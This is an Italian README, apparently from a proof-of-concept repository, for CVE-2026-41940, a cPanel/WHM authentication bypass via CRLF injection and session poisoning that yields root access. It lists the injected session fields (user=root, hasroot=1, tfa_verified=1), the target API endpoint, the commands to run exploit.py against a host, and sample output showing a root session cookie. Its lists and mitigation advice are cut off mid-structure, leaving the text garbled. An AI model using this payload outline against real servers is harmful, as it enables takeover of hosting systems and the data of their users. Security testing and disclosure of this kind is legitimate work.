
Proof-of-concept exploit per CVE-2026-41940, che dimostra il bypass dell'autenticazione in cPanel/WHM tramite iniezione CRLF e session poisoning per ottenere accesso a livello root.
Questo repository contiene un proof-of-concept (PoC) per CVE-2026-41940, che dimostra un bypass dell'autenticazione in più passaggi in cPanel/WHM tramite iniezione CRLF e avvelenamento della sessione.
Disclaimer: Questo codice è destinato esclusivamente a test di sicurezza educativi e autorizzati. NON utilizzarlo contro sistemi di cui non sei proprietario o per i quali non hai esplicita autorizzazione al test.
Questo PoC replica una catena di sfruttamento reale basata su tecniche osservate da Hadrian e watchTowr.
La vulnerabilità consente a un attaccante di:
Lo sfruttamento segue un processo in 4 passaggi:
whostmgrsession / cpsession)Authorization appositamente costruito (codificato in base64)Il payload iniettato include:
user=root
hasroot=1
tfa_verified=1
cp_security_token=/cpsessXXXXXXXXXX
/json-api/version?api.version=1Se ha successo:
requestsInstallare la dipendenza:
pip install requests
python3 exploit.py --host <target>
--ssl Usa HTTPS--port Specifica una porta personalizzata--verbose Abilita l'output di debugpython3 exploit.py --host example.com --ssl --port 2087 --verbose
Sfruttamento riuscito:
[+] SUCCESSO! Autenticato come root tramite CVE-2026-41940.
[+] Cookie: whostmgrsession=...
[+] URL Admin: https://target:2087/cpsess.../json-api/version?api.version=1
Se sei un amministratore di sistema:
La vulnerabilità risiede in:
L'exploit abusa di:
AuthorizationQuesto PoC è fornito così com'è per:
L'uso non autorizzato può violare leggi e regolamenti.